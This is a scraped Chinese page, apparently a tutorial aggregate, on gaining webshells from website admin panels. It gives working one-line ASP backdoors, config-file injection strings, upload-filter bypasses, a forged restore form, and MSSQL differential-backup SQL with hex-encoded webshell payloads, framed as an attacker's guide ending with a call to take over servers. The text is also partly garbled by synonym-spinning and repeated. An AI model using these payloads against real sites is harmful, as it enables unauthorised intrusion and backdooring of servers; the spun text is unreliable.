精华内容
下载资源
问答
  • 全自动GOOLE搜索,批量拿SHELL
  • 网站后台拿shell方法总结

    万次阅读 2015-03-18 23:19:19
    今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能...在站历程中,我们凡是费了九牛两虎之力到办理员帐号和密码,并顺遂进入了后台,当然此时与网站webshell还有一步之遥
    今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手.
    动网上传漏洞,信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国,现在这种漏洞已经根柢斗劲难见到了,不扫除一些小网站模拟仍是存在此漏洞。在拿站历程中,我们凡是费了九牛两虎之力拿到办理员帐号和密码,并顺遂进入了后台,当然此时与拿到网站webshell还有一步之遥,但仍是有良多新手因想不出合适的体例而被拒之门外。是以,我们把常用的从后台获得webshell的体例进行了总结和归纳,概略情形有以下十细腻面。
    详尽:若何进入后台,不是本文谈判规模,其具体体例就不说了,靠大伙去自己发挥。此文参考了前人的多方面的资料和信息,在此一并浮现感谢。
    一、直接上传获得webshell
    二、添加改削上传典型
    三、操纵后台办理功效写入webshell
    四、操纵后台办理向设置装备摆设文件写webshell
    五、操纵后台数据库备份及恢复获得webshell
    六、操纵数据库压缩功效
    七、asp+mssql系统
    八、php+mysql系统
    九、phpwind论坛从后台到webshell的三种体例
    一、直接上传获得webshell
    这种对php和jsp的一些轨范斗劲常见,MolyX BOARD即是其中一例,直接在神色图标办理上传.php典型,当然没有提醒,实在已经乐成了,上传的文件url应该是http://admin8.us/images/smiles/下,前一阵子的联众游戏站和163的jsp系统漏洞就可以直接上传jsp文件。文件名是原本的文件名,bo-博客后台可以可以直接上传.php文件,上传的文件路径有提醒。以及一年前很是流行的upfile.asp漏洞(动网5.0和6.0、早期的良多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站尽情可写目录中,从而拿到网站的办理员节制权限。
    二、添加改削上传典型
    现在良多的脚本轨范上传模块不是只答应上传正当文件典型,而年夜年夜都的系统是答应添加上传典型,bbsxp后台可以添加asa asP典型,ewebeditor的后台也可添加asa典型,经由过程改削后我们可以直接上传asa后缀的webshell了,还有一种情形是过滤了.asp,可以添加.aspasp的文件典型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传典型,这是php的一个特征,末尾的哪个只要不是已知的文件典型即可,php会将php.g1f作为.php来正常运行,从而也可乐成拿到shell。LeadBbs3.14后台获得webshell体例是:在上传典型中增添asp ,详尽,asp后背是有个空格的,然后在前台上传ASP马,当然也要在后背加个空格!
    三、操纵后台控制面板写入webshell
    上传漏洞根柢上补的也差不多了,所以我们进入后台后还可以经由过程改削相关文件来写入webshell。斗劲的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台改削设置装备摆设文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一体例是:添加一个新的友谊链接,在网站名称处写上冰狐最小马即可,最小马前后要肆意输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp即是我们想要的shell。
    四、操纵后台办理向设置装备摆设文件写webshell
    操纵”"”":”"//”等标识表记标帜结构最小马写入轨范的设置装备摆设文件,joekoe论坛,某某同学录,沸腾展望动静系统,COCOON Counter统计轨范等等,还有良多php轨范都可以,COCOON Counter统计轨范举例,在办理邮箱处添上cnhacker@admin8.us”:eval request(chr (35))//, 在配制文件中即是webmail=”cnhacker@admin8.us\”:eval request(chr(35))//”,还有一种体例即是写上 cnhacker@admin8.us”%><%eval request(chr(35))%><%’,这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时刻要选前者。再如动易2005,到文章中心办理-顶部菜单设置-菜单别的特效,插入一句话马”%><%execute request(“l”)%><%’,保 存顶部栏目菜单参数设置乐成后,我们就获得马地址http://网站/admin/rootclass_menu_config.asp。
    五、操纵后台数据库备份及恢复获得webshell
    重若是操纵后台对access数据库的“备份数据库”或“恢复数据库”功效,“备份的数据库路径”等变量没有过滤导致可以把尽情文件后缀改 为asp,从而获得webshell,msssql版的轨范就直接应用了access版的代码,导致sql版仍是可以操纵。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以检察并获得网页源代码,并获得更多的轨范信息增添获得webshell的机缘。在现实运用中凡是会碰着没有上传功效的时 候,可是有asp系统在运行,操纵此体例来检察源代码来获得其数据库的位置,为数据库插马来缔造机缘,动网论坛就有一个ip地址的数据库,在后台的ip办理中可以插入最小马然后备份成.asp文件即可。在谈谈冲破上传检测的体例,良多asp轨范期近使改了后缀名后也会提醒文件犯警,经由过程在.asp文件头加上gif89a改削后缀为gif来骗过asp轨范检测到达上传的方针,还有一种即是用记事本打开图片文件,肆意粘贴一部门复制到asp木马文件头,改削gif后缀后上传也可以冲破检测,然后备份为.asp文件,乐成获得webshell。
    六、操纵数据库压缩功效
    可以将数据的防下载失踪效从而使插入数据库的最小马乐成运行,斗劲典型的即是loveyuki的L-BLOG,在友谊添加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操纵中压缩数据库,可以乐成压缩出.asp文件,用海洋的最小马的eval客户端连就获得一个webshell。
    七、asp+mssql系统
    这里需要提一点动网mssql版,可是可以直接当地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个当地提交的表单,代码如下:
    <form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method=”post”>
    <p>已上传文件的位置:<input name=”Dbpath” type=”text” size=”80″></p>
    <p>要复制到的位置:<input name=”backpath” type=”text” size=”80″></p>
    <p><input type=”submit” value=”提交”></p> </form>
    另存为.htm当地实施。把假图片上传路径填在“已上传文件的位置”何处,想要备份的WebShell的相对路径填写在“要复制到的位置”何处,提交就获得我们可爱的WebShell了,恢复代码和此类似,改削相关地方就可以了。没有碰着事后台实施mssql饬令斗劲强大的asp轨范后台,动网的数据库还原和备份是个摆设,不能实施sql饬令备份webshell,只能实施一些大略的盘问饬令。可以操纵mssql注入差别备份webshell,一样平常后台是浮现了绝对路径,只要有了注入点根柢上就可以差别备份乐成。下面是差别备份的主要语句代码,操纵动网7.0的注入漏洞可以用差别备份一个webshell,可以用操纵上面提到的体例,将conn.asp文件备份成.txt文件而获得库名。
    差别备份的主要代码:
    ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0×626273 backup database @a to disk=@s–
    ;Drop table [heige];create table [dbo].[heige] ([cmd] [image])–
    ;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)–
    ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT–
    这段代码中,0×626273是要备份的库名bbs的十六进制,可所以其他名字好比bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request(“l”)%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也即是你要备份的webshell路径。当然也可以用斗劲常见备份体例来获得webshell,独一的不够即是备份后的文件过年夜,若是备份数据库中有防下载的的数据表,概略有错误的asp代码,备份出来的webshell就不会乐成运行,操纵差别备份是乐成率斗劲高的体例,而且极年夜的淘汰备份文件的巨细。
    八、php+mysql系统
    后台需要有mysql数据盘问功效,我们就可以操纵它实施SELECT … INTO OUTFILE盘问输出php文件,因为全数的数据是存放在mysql里的,所以我们可以经由过程正常本事把我们的webshell代码插入mysql在操纵SELECT … INTO OUTFILE语句导出shell。
    就可以暴出路径,php情形中斗劲轻易暴出绝对路径:)。提一点的是碰着是mysql在win系统下路径应该这样写。下面的体例是斗劲常用的一个导出webshell的体例,也可以写个vbs添加系统办理员的脚本导出到启动文件夹,系统重起后就会添加一个办理员帐号
    就会在up目录下生成文件名为saiy.php内容为的最小php木马, 末尾用lanker的客户端来毗连。现实运用中要考虑到文件夹是否有写权限。概略输入这样的代码 将会在当前目录生成一个a.php的最小马。
    九、phpwind论坛从后台到webshell的三种体例
    体例1 模板法
    进入后台, 气概气派气概气派模版设置 ,在肆意一行写代码,记着,这代码必需顶着左边行写,代码前面不成以有任何字符。
    方始2 脏话过滤法
    体例3 用户品级办理
    以上三种体例获得webshellr的密码是a,为lanker的一句话后门办事端。
    十、也可以操纵网站访谒计数系统记实来获得webshell
    解决方法
    因为本文涉及的代码版本良多,所以不概略供给一个完竣的办理方案。有本事者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统操纵也可删除此文件。大伙若是不会修补,可以到相关官方网站下载最新补丁进行修复更新。同时也请大伙能时辰关注各年夜平安收集揭晓的最新通告,若自己发现相关漏洞也可实时看护官方网站。
    后记
    实在,从后台获得webshell的本事应该还有良多的,关头是要看大伙怎么无邪运用、举一反三,盼愿本文的体例能起到抛砖引玉的浸染。 列位加油吧,让我们将办事器节制到底!

    正进修后台拿Shell的体例,今日恰巧在网上瞥见获得后台拿shell的汇总全集,很不错的总结,分享了!版主给个精髓吧!??今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手.??动网上传漏洞,信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国,现在这种漏洞已经根柢斗劲难见到了,不扫除一些小网站模拟仍是存在此漏洞。在拿站历程中,我们凡是费了九牛两虎之力拿到办理员帐号和密码,并顺遂进入了后台,当然此时与拿到网站webshell还有一步之遥,但仍是有良多新手因想不出合适的体例而被拒之门外。是以,我们把常用的从后台获得webshell的体例进行了总结和归纳,概略情形有以下十细腻面。
    详尽:若何进入后台,不是本文谈判规模,其具体体例就不说了,靠大伙去自己发挥。此文参考了前人的多方面的资料和信息,在此一并浮现感谢。
    一、直接上传获得webshell?二、添加改削上传典型?三、操纵后台办理功效写入webshell四、操纵后台办理向设置装备摆设文件写webshell五、操纵后台数据库备份及恢复获得webshell六、操纵数据库压缩功效七、asp+mssql系统八、php+mysql系统?九、phpwind论坛从后台到webshell的三种体例

    一、直接上传获得webshell
    这种对php和jsp的一些轨范斗劲常见,MolyX BOARD即是其中一例,直接在神色图标办理上传.php典型,当然没有提醒,实在已经乐成了,上传的文件url应该是http://admin8.us/images/smiles/下,前一阵子的联众游戏站和163的jsp系统漏洞就可以直接上传jsp文件。文件名是原本的文件名,bo-博客后台可以可以直接上传.php文件,上传的文件路径有提醒。以及一年前很是流行的upfile.asp漏洞(动网5.0和6.0、早期的良多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站尽情可写目录中,从而拿到网站的办理员节制权限。
    二、添加改削上传典型
    现在良多的脚本轨范上传模块不是只答应上传正当文件典型,而年夜年夜都的系统是答应添加上传典型,bbsxp后台可以添加asa asP典型,ewebeditor的后台也可添加asa典型,经由过程改削后我们可以直接上传asa后缀的webshell了,还有一种情形是过滤了.asp,可以添加.aspasp的文件典型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传典型,这是php的一个特征,末尾的哪个只要不是已知的文件典型即可,php会将php.g1f作为.php来正常运行,从而也可乐成拿到shell。LeadBbs3.14后台获得webshell体例是:在上传典型中增添asp ,详尽,asp后背是有个空格的,然后在前台上传ASP马,当然也要在后背加个空格!

    三、操纵后台控制面板写入webshell
    上传漏洞根柢上补的也差不多了,所以我们进入后台后还可以经由过程改削相关文件来写入webshell。斗劲的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台改削设置装备摆设文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一体例是:添加一个新的友谊链接,在网站名称处写上冰狐最小马即可,最小马前后要肆意输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp即是我们想要的shell。
    四、操纵后台办理向设置装备摆设文件写webshell
    操纵”"”":”"//”等标识表记标帜结构最小马写入轨范的设置装备摆设文件,joekoe论坛,某某同学录,沸腾展望动静系统,COCOON Counter统计轨范等等,还有良多php轨范都可以,COCOON Counter统计轨范举例,在办理邮箱处添上cnhacker@admin8.us”:eval request(chr (35))//, 在配制文件中即是webmail=”cnhacker@admin8.us\”:eval request(chr(35))//”,还有一种体例即是写上 cnhacker@admin8.us”%><%eval request(chr(35))%><%’,这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时刻要选前者。再如动易2005,到文章中心办理-顶部菜单设置-菜单别的特效,插入一句话马”%><%execute request(“l”)%><%’,保 存顶部栏目菜单参数设置乐成后,我们就获得马地址http://网站/admin/rootclass_menu_config.asp。
    五、操纵后台数据库备份及恢复获得webshell
    重若是操纵后台对access数据库的“备份数据库”或“恢复数据库”功效,“备份的数据库路径”等变量没有过滤导致可以把尽情文件后缀改 为asp,从而获得webshell,msssql版的轨范就直接应用了access版的代码,导致sql版仍是可以操纵。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以检察并获得网页源代码,并获得更多的轨范信息增添获得webshell的机缘。在现实运用中凡是会碰着没有上传功效的时 候,可是有asp系统在运行,操纵此体例来检察源代码来获得其数据库的位置,为数据库插马来缔造机缘,动网论坛就有一个ip地址的数据库,在后台的ip办理中可以插入最小马然后备份成.asp文件即可。在谈谈冲破上传检测的体例,良多asp轨范期近使改了后缀名后也会提醒文件犯警,经由过程在.asp文件头加上gif89a改削后缀为gif来骗过asp轨范检测到达上传的方针,还有一种即是用记事本打开图片文件,肆意粘贴一部门复制到asp木马文件头,改削gif后缀后上传也可以冲破检测,然后备份为.asp文件,乐成获得webshell。
    六、操纵数据库压缩功效
    可以将数据的防下载失踪效从而使插入数据库的最小马乐成运行,斗劲典型的即是loveyuki的L-BLOG,在友谊添加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操纵中压缩数据库,可以乐成压缩出.asp文件,用海洋的最小马的eval客户端连就获得一个webshell。

    七、asp+mssql系统
    这里需要提一点动网mssql版,可是可以直接当地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个当地提交的表单,代码如下:
    <form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method=”post”>
    <p>已上传文件的位置:<input name=”Dbpath” type=”text” size=”80″></p>
    <p>要复制到的位置:<input name=”backpath” type=”text” size=”80″></p>
    <p><input type=”submit” value=”提交”></p> </form>
    另存为.htm当地实施。把假图片上传路径填在“已上传文件的位置”何处,想要备份的WebShell的相对路径填写在“要复制到的位置”何处,提交就获得我们可爱的WebShell了,恢复代码和此类似,改削相关地方就可以了。没有碰着事后台实施mssql饬令斗劲强大的asp轨范后台,动网的数据库还原和备份是个摆设,不能实施sql饬令备份webshell,只能实施一些大略的盘问饬令。可以操纵mssql注入差别备份webshell,一样平常后台是浮现了绝对路径,只要有了注入点根柢上就可以差别备份乐成。下面是差别备份的主要语句代码,操纵动网7.0的注入漏洞可以用差别备份一个webshell,可以用操纵上面提到的体例,将conn.asp文件备份成.txt文件而获得库名。
    差别备份的主要代码:
    ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0×626273 backup database @a to disk=@s–
    ;Drop table [heige];create table [dbo].[heige] ([cmd] [image])–
    ;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)–
    ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT–
    这段代码中,0×626273是要备份的库名bbs的十六进制,可所以其他名字好比bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request(“l”)%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也即是你要备份的webshell路径。当然也可以用斗劲常见备份体例来获得webshell,独一的不够即是备份后的文件过年夜,若是备份数据库中有防下载的的数据表,概略有错误的asp代码,备份出来的webshell就不会乐成运行,操纵差别备份是乐成率斗劲高的体例,而且极年夜的淘汰备份文件的巨细。
    八、php+mysql系统
    后台需要有mysql数据盘问功效,我们就可以操纵它实施SELECT … INTO OUTFILE盘问输出php文件,因为全数的数据是存放在mysql里的,所以我们可以经由过程正常本事把我们的webshell代码插入mysql在操纵SELECT … INTO OUTFILE语句导出shell。?  就可以暴出路径,php情形中斗劲轻易暴出绝对路径:)。提一点的是碰着是mysql在win系统下路径应该这样写。下面的体例是斗劲常用的一个导出webshell的体例,也可以写个vbs添加系统办理员的脚本导出到启动文件夹,系统重起后就会添加一个办理员帐号?  就会在up目录下生成文件名为saiy.php内容为的最小php木马, 末尾用lanker的客户端来毗连。现实运用中要考虑到文件夹是否有写权限。概略输入这样的代码 将会在当前目录生成一个a.php的最小马。
    九、phpwind论坛从后台到webshell的三种体例
    体例1 模板法
    进入后台, 气概气派气概气派模版设置 ,在肆意一行写代码,记着,这代码必需顶着左边行写,代码前面不成以有任何字符。
    方始2 脏话过滤法
    体例3 用户品级办理
    以上三种体例获得webshellr的密码是a,为lanker的一句话后门办事端。
    十、也可以操纵网站访谒计数系统记实来获得webshell
    解决方法
    因为本文涉及的代码版本良多,所以不概略供给一个完竣的办理方案。有本事者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统操纵也可删除此文件。大伙若是不会修补,可以到相关官方网站下载最新补丁进行修复更新。同时也请大伙能时辰关注各年夜平安收集揭晓的最新通告,若自己发现相关漏洞也可实时看护官方网站。
    后记
    实在,从后台获得webshell的本事应该还有良多的,关头是要看大伙怎么无邪运用、举一反三,盼愿本文的体例能起到抛砖引玉的浸染。 列位加油吧,让我们将办事器节制到底!

    展开全文
  • phpmyadmin拿网站shell

    2018-11-16 23:21:13
    时间:2018-11-15 ID:joker_vip(CSDN)  这是本人第一次在这个论坛发表学术文章,希望我的文章能够给一些... 这次的渗透是半运气+半技术的成果,首先在谷歌搜索引擎中批量查找存在PHP探针的网站,类似于下图...

    时间:2018-11-15

    ID:joker_vip(CSDN)

        这是本人第一次在这个论坛发表学术文章,希望我的文章能够给一些新手一些帮助,如果有问题,希望大佬们能轻喷。因为我也是在校大学生,也是信息安全方面的爱好者,所以这些渗透只是也全是自学的,也希望有大佬指点指点我,带一带我。

        这次的渗透是半运气+半技术的成果,首先在谷歌搜索引擎中批量查找存在PHP探针的网站,类似于下图这种网页。

        之后我在网页下方尝试使用弱口令进行连接,绝大多数网站都是改过密码的,使用弱口令失败。

        只有极少数的网站可能使用默认密码,类似于下图。

          连接成功后,点击phpMyAdmin管理。

         进入到登陆页面,进行刚刚测试的弱口令对其登陆,登陆成功了。

            成功进入到管理后台中。

        执行sql语句,进行插入一句话木马。

        目录路径为这个。

        点击执行,执行成功。

        使用中国菜刀对一句话进行连接。

        连接成功。

        之后上传大马后门。

        访问大马,成功进入,有趣的是本人通过扫描还发现了文件中存在其他木马,秉承着道德良好的品行,义不容辞的帮助此站删除了其他木马后门。

        测试完成后,联系其网站管理员,发现是一美国的服务器,无奈英语不好的我只有用谷歌翻译向网站管理员发送邮件说明情况,对方回应会修复其漏洞,最后我删除上传的木马,删除日志,一气呵成,深藏功与名。

        最后提一句,网站测试不等于搞破坏,挂黑页、删库等恶劣行为,最好不要进行上述等操作。希望大家都能成为信息安全领域的大佬。


    时间:2018-11-15

    ID:joker_vip(简书)

    --未经本人允许不得转载,允许转载需表明出处。--


     

    展开全文
  • ASP上传漏洞拿shell

    2019-10-18 21:54:32
    ASP上传漏洞拿shell 今天看到一个老古董级的拿站手法——ASP上传漏洞拿shell,所以跟大家交流交流。ASP是什么呢?ASP全称Active Server Pages,一种动态服务器页面(是在服务器上面的),因为当初web程序复杂不便...

                                              ASP上传漏洞拿shell

    今天看到一个老古董级的拿站手法——ASP上传漏洞拿shell,所以跟大家交流交流。ASP是什么呢?ASP全称Active Server Pages,一种动态服务器页面(是在服务器上面的),因为当初web程序复杂不便开发,所以Microsoft公司在1996年推出一种Web应用开发技术,来简化web开发。

    ASP是一种在服务器端开发的脚本环境,可用来创建动态交互式网页。当服务器收到对ASP文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本置标语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也可以包含文本、HTML(包括相关的客户端脚本)和com组件调用。

    在当时计算机的内存普遍不大,不能跟我们现在电脑的硬件配置相比,而asp程序的运行恰恰硬件环境没有特别的要求,所以在当初有很高的使用量(还有一个原因就是它免费,你懂的)。

    ASP所使用的脚本语言均在Web服务器端执行,服务器上的ASP解释程序会在服务器端执行ASP程序,并将结果以HTML格式传送到客户端浏览器上,它提供的一些内置对象,使用这些对象可以使服务器端脚本功能更强。ASP可以使用服务器端ActiveX组件来执行各种各样的任务,例如存取数据库、发现和那个Email或访问文件系统等。

    ASP它对大的特点就是它本身,因为它的执行方式是解释执行,所以就注定了它的不安全性,漏洞多,易注入等;所以现在都用PHP代替ASP了,而且ASP不能很好支持跨平台的移植。下面来图解释。

    大家可以在网上找一些ASP的站点(很老的网站了估计),找了一个shopxp的漏洞代码去试了试。浏览器搜索inurl:shopxp_news.asp?id=87

    进入后台看看

     

    结果就是这样了,应该是已经修复过了或者是已经不用ASP了,本来还想暴库试试。公布一下暴库代码 ,算了,那个你懂的,代码就不发了。如果你成功了,拿到了暴库后的字符串,我想这两个链接你可能用的到https://www.cmd5.com/和https://www.somd5.com/。

    展开全文
  • 拿shell的一些方式

    千次阅读 2019-04-06 23:42:23
    管理权限拿shell 需要有管理员权限才可以拿shell 如织梦cms 数据库备份拿shell 网站对上传的文件后缀进行过滤,不允许上传脚本类型文件如asp/php/jsp/aspx等 但是网站具有备份数据库备份功能,这时我们可以将...

    管理权限拿shell

    需要有管理员权限才可以拿shell

    如织梦cms

    数据库备份拿shell

    网站对上传的文件后缀进行过滤,不允许上传脚本类型文件如asp/php/jsp/aspx等

    但是网站具有备份数据库备份功能,这时我们可以将webshell格式先将改为可允许上传的文件格式如jpg gif等

    然后,我们找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式

    如动力文章

    阉割版cms

    1. ecshop
    2. wordpress
    3. dedecms
    4. aspcms
    5. 良精
    6. 南方
    7. 帝国
    8. phpv9
    9. 科讯

    突破上传拿shell

    • 本地js验证上传
    • 服务器mime上传
    • 服务器白名单上传
    • 服务器黑名单上传
    • 服务器filepath上传

     filepath漏洞主要用来突破服务器自动命名规则,主要有以下两种利用方式:
        1、改变文件上传后路径(filepath),可以结合目录解析漏洞,路径/x.asp/
        2、直接改变文件名称(都是在filepath下进行修改),路径/x.asp;.

    • 双文件上传
    • %00截断上传

     00截断的两种利用方式:
        1、更改filename,xx.php .jpg,在burpsuit中将空格对应的hex 20改为00
        2、更改filename,xx.php%00.jpg,在burpsuit中将%00进行右键转换-url-urldecoder

    • 上传其他脚本类型拿webshell

    phpweb拿shell方式利用iis6.0文件名分号解析,%00截断

    修改网站上传类型配置拿webshell

    有的网站,在网站上传类型中限制了上传脚本类型文件,我们可以去添加上传文件类型如添加asp|php|jsp|aspx|asa来拿webshell

    利用解析漏洞拿webshell

    • iis5.x/6.0解析漏洞

      iis6.0解析漏洞主要有以下三种:
     1. 目录解析漏洞 /xx.asp/xx.jpg
        在网站下创建文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都被iis当做asp文件来解析并执行。因此只要攻击者可以通过该漏洞直接上传图片马,并且可以不需要改后缀名!
    2. 文件解析 xx.asp;.jpg
        在iis6.0下,分号后面的不被解析,所以xx.asp;.jpg被解析为asp脚本得以执行。
    3. 文件类型解析 asa/cer/cdx
        iis6.0 默认的可执行文件除了asp还包含这三种asa、cer、cdx。

    • iis7.0/iis7.5/Nginx <8.03畸形解析漏洞 

        在默认Fast-CGI开启状况下上传名字为xx.jpg,内容为:
    <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
        然后访问xx.jpg/.php,在这个目录下就会生成一句话木马shell.php。

    • Nginx <8.03 空字节代码执行漏洞

      nginx如下版本:0.5., 0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37在使用PHP-FastCGI执行php的时候,URL里面在遇到%00空字节时与FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码。
        另一种Nginx文件漏洞是从左到右进行解析,既可绕过对后缀名的限制,又可上传木马文件,因此可以上传XXX.jpg.php(可能是运气,也可能是代码本身问题,但在其他都不能成功的条件下可以试试)。如下:
    Content-Disposition: form-data; name="userfiles"; filename="XXX.jpg.php"

    • Apache解析漏洞  

        Apache对文件的解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析为PHP类型。

    利用编辑器漏洞拿webshell

    常见的编辑器有fckeditor,ewebeditor,cheditor等

    fck,ckfinder 一般可以通过改上传目录,利用解析漏洞拿webshell

    网站配置插马拿webshell

    通过找到网站默认配置,将一句话插入到网站配置中,不过为了能够成功执行插马,建议先下载该网站源码,进行查看源码过滤规则,以防插马失败。

    "%><%eval request("aaa")%><%'

    "%><%eval(Request(chr(112)))%><%'     密码为p 这里用单引号是因为asp脚本文件中,单引号代表注释,后面的不执行

    通过编辑模板拿webshell

    通过对网站的模板进行编辑写入一句话,然后生成脚本文件拿shell

    通过将木马添加到压缩文件,把名字改成网站模板类型,上传到网站服务器,拿webshell

    上传插件拿webshell

    一些网站为了增加某些功能会在后台添加一些插件来实现

    我们可以把木马添加到安装的插件中上传服务器拿webshell

    常见的有博客类网站,dz论坛都可以

    数据库执行拿webshell

    我们可以通过数据库执行命令导出一句话到网站根目录拿webshell

    access数据库导出一般需要利用解析漏洞xx.asp;xml

    sqlserver 导出

    ;exec%20sp_makewebtask%20%20%27c:\inetpub\wwwroot\ms\x1.asp%27,%27<%execute(request("cmd"))%>%27%27%27--

    数据库命令执行拿webshell

    mysql命令导出shell

    create table study (cmd text NOT NULL);

    insert INTO study (cmd)values('<?php @eval($_POST[value]);?>');
    select cmd from study into outfile'F:/phpstudy/WWW/DVWA-master/aaaa.php';
    Drop TABLE IF EXISTS study;

    版本二

    use mysql;

    create table x(packet text) type=MYISam;

    insert into x (packet) values('<pre><body><?php @system($_GET["cmd"])' ?></body></pre>")

    select x into outfile 'd:\php\xx.php'

    版本三

    select '<?php eval($_POST[cmd]);?>'into outfile 'c:/inetpub/wwwroot/mysql.php/1.php'

    进入phpmyadmin

    假如知道网站路径

    直接执行sql语句导入一句话拿shell

    方法:

    create table study (cmd text NOT NULL);    //创建一个表名为study ,添加一个列名为cmd 类型为text   不允许为空

    insert INTO study (cmd)values('<?php @eval($_POST[value]);?>');   往列cmd中插入数据  ,这里插入的是一句话

     select cmd from study into outfile'F:/phpstudy/WWW/DVWA-master/aaaa.php'; //将cmd列中的内容导入到网站根目录下

    Drop TABLE IF EXISTS study;   //删除这个表

    假如不知道路径

    我们可以推理路径

    看PHPmyadmin 中变量推理出路径


    路径为 F:/phpstudy/Apache/conf/httpd.conf

    则我们可以创建一个表
    create  table a(a text);  创建一个表为a   列为a  类型为text;

    阅读我们推理出文件的内容写入到该表中

    load data infile"F:/phpstudy/Apache/conf/httpd.conf" into table a; //写入表中存在编码问题始终没解决,希望有人懂得可以分享一下

    SELECT LOAD_FILE( "f:/phpstudy/apache/conf/httpd.conf" );

     

     

    linux下

    知道/usr/local/mysql

    推测/usr/local/apache/conf/httpd.conf

    /usr/local/httpd/conf/httpd.conf

    /etc/httpd/conf/httpd.conf

    nginx

    /usr/local/nginx/conf/nginx.conf

    phpmyadmin

    写入大文件到表,让其报错

    报错时候会把当前脚本根路径爆出来

    文件包含拿shell

    先将webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可绕过waf拿webshell

    asp包含

    1.<!--#include file="123.jpg"-->

    2.调用的文件必须和被调用的文件在同一目录,否则找不到

    3.如果不在同一目录,用下面的语句

    <!--#include virtual="文件所在目录/124.jpg"-->

     

    php包含

    <?php

    include('123.jpg');

    ?>

    命令执行拿shell

    echo ^<^?php @eval($_POST['123']);?^>^> c:\1.php

    echo ^<^?php @eval($_POST['123']);?^>^> c:\1.php

    ^<^%eval request("123")%^>^> c:\1.php

    普通用户前台拿webshell

    • oday拿webshell   
    • iis写权限拿webshell
    • 命令执行拿webshell
    • 通过注入漏洞拿webshell
    • 前台用户头像上传拿webshell
    • strusts2拿webshell
    • java反序列拿webshell

    常见cms拿shell

    • 良精。科讯,动易,aspcms
    • dz
    • 米拓cms
    • phpcms2008
    • 帝国cms
    • phpv9
    • phpweb
    • dedecms

    1.良精拿shell方式

    • 数据库备份拿shell
    • 双文件上传
    • 配置插马
    • 修改文件类型直接上传

    2.科讯cms

    上传后缀名为aaspsp

    3.动易cms

    • 数据库备份拿shell
    • 配置插马

    4.aspcms

    • 网站配置插马
    • a.asp;.htm分号解析上传拿webshell

    5.dz

    配置插马

    6.米拓cms

    导入导出数据库  前提条件,必须有数据库备份功能和权限大
    7.帝国cms

     

     

    命名成这个的原因,导入之后它会自己解压,然后就成了aa.php成功执行脚本,

    内容为

    <?php 
    fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>'); 
    ?>

    然后我们让它执行一个函数

     

    成功执行,此时菜刀也能连接上

     

    8.phpcms

    第一种方式

    登上后台 :点击界面-》模板风格-》点击目录进行辩解

    低版本可以,高版本不行

    第二种方式

    点击phpsso->ucenter配置

    配置插马

    第三种 phpv9低权限拿shell

    点击内容-》专题  添加专题

    9.dedecms

    织梦可以直接上传,数据刻苦备份,等

     

     

     

     

     




     

    展开全文
  •  找个大牛拿shell,拿网站权限,数据,重酬,有实力的可以联-系-Q-330-874426 只要你有这个实力,重酬,
  • 关于js拿shell的尝试

    千次阅读 2019-05-04 10:57:29
    以前在测试一个网站的时候,大佬提供了一个拿shell的思路,通过js拿到了shell。 当时的情况是这样的,首页为*****/bin/home.php,通过弱口令进入后台,后台所有上传等可以拿shell的路都被阻止了,当时有一个可以控制...
  • DZ拿shell总结

    万次阅读 2016-01-23 17:49:17
